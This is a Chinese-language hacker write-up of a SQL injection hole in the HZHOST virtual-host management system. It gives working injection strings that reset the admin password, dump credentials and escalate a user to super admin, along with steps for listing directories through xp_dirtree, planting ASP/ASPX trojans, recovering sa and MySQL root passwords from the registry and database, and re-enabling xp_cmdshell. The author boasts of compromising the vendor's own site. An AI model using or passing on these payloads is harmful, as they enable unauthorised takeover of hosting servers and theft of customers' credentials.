HZHOST域名虚拟主机管理系统sql注射漏洞+进一步利用

这是一个域名主机实时管理系统。在百度搜索：title:(域名主机实时管理系统)，会找到大量采用这种系统的网站！太术语了。就是在线开通ftp.sql.web的一个管理系统。一套web程序。和IIS管理程序。实现在线开通的玩意。所以：我们可以免费申请域名和空间！！哈哈！！！web程序方面写的非常严谨。大量的过滤。由于是商业版的程序，所以我没有源码。本来是有的，但是放在家里的电脑上。放暑假时搞的shell现在都被删了。。。我现在又比较懒，就没去弄源代码。反正大家知道怎么弄的就行了。这又是一个文本框的注射。我真不知道作者是怎么想的。其他地方都被过滤了。就留下域名管理这里没过滤。官方放暑假的时候就被我搞了一遍，过了一个月他发现了。删了我的shell。不知道他怎么知道我从那里下的手搞的他。他居然补了漏洞。先上图，再说下利用方法。123'UPDATE[memlst]SETu_pss='e10adc3949ba59abbe56e057f20f883e'WHEREu_nme='admin'--这一句是把用户admin的密码修改为123456。管理员的后台地址一般是。如果admin不是超级管理员，那就有三个办法。一是自己构造语句爆出来。二是提升自己注册的用户的权限。三是直接爆网站路径，再来个差异备份。第一个方法我给出一条示范语句：123'and(selecttop1isnull(cast([u_nme]asnvarchar(4000)),char(32))+char(94)+isnull(cast([U_pss]asnvarchar(4000)),char(32))from(selecttop2u_nme,U_pssfrom[hzhost]..[memlst]where1=1orderby[u_nme])torderby[u_nme]desc)0--and'1'='1可以同时爆出一个用户的帐号和密码。想爆出其他用户的语句自己构造吧。第二个方法是：123'UPDATE[memlst]SETu_sys=6WHEREu_nme='你注册的用户名'--123'UPDATE[memlst]SETu_pwr=2WHEREu_nme='你注册的用户名'--这2句话就能够提升自己为超级管理员第三个方法很麻烦。但是很有效果。直捣黄龙。。很强大。我给出如下语句，大家自己研究去吧！爆路径语句第一步：建立表123';droptablefoofoofoo;createtablefoofoofoo([id][int]identity(1,1)notnull,[name][nvarchar](300)notnull,[depth][int]notnull,[isfile][nvarchar](50)null);--and'1'='1第二步：123';declare@znvarchar(4000)set@z=0x63003a005c00insertfoofoofooexecutemaster..xp_dirtree@z,1,1--and'1'='1注意：0x63003a005c00=C:\为sqlENCODE其他的自己找工具去转吧！第三步：暴出总数123'and(selectcast(count(*)asvarchar(8000))+char(94)fromfoofoofoo)0--and'1'='1第四步：暴出你想要的文件夹名字和文件名字123'and0(selecttop1cast([isfile]asnvarchar(4000))+char(94)+cast([name]asnvarchar(4000))from(selectdistincttop1*fromfoofoofooorderbyisfile,name)torderbyisfiledesc,namedesc)--and'1'='1修改中间红色的1，依次爆出。至于差异备份语句。让nbsi3告诉你吧。对HZHOST域名虚拟主机管理系统sql注射漏洞进一步利用！我记得还有2篇关于hzhost的漏洞利用文章。名字不记得了。大家去搜索“hzhost漏洞”找找吧！里面提到下面两点内容！1。是提到c:\windows\temp下有hzhost主机留下的ftp登陆记录。有用户名和密码2。是利用hzhost拿系统主机最高权限的。安装了hzhost的主机,其mssqlsa密码,mysqlroot密码还有serv-u的administrator密码全部保存在注册表中。位置在HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpassHKEY_LOCAL_MACHINE\software\hzhost\config\settings\mastersvrpass经过了hzhost自己的加密方式，象eLVClO4tzsKBf#dee52443a3872cc159这样的字符串。不过在hzhost后台可以还原！拿到了sa密码，或者root密码，最高权限就在眼前！禁止了w.s的话。大家就传aspx木马导撒！我们传了一个asp木马上去后。在incs\constr.asp下面可以看到数据库连接串。然后连接到数据库。通过执行SELECT*FROM[hstlst]语句。可以看到很多主机记录。如图发现什么没有？h_ftppass的密码和hzhost主机自己的加密串很相似。没错，主机管理的密码也是经过他自己的加密方式加了密！而我们在主机管理的地方！看到明文密码。说明他又给还原回来了。明白了么？我们先通过aspx木马导出mysql，mssql的root,sa密码加密串后。我们通过这条语句，修改别人的主机密码。UPDATE[hstlst]SETh_ftppss='aPWw3j4zMaK83lHMBof9fc298b1d3d0a'WHEREh_ID=10000471然后回过头去看主机密码。（这时候被转成了明文）就拿到了root密码为：sphil_070921注意：由于有多种限制。我截的图可能不是很完美。但是此方法绝对可行。这方法是看到别人写的[利用hzhost取得最高权限]得到的启发。谢谢他。我们也可以同样拿到sa密码，用sa帐号密码远程连接，直接恢复xp_cmdshell就可以执行系统命令了！好了。就此结束！期待牛人写出还原密码程序！！这样就不用麻烦了！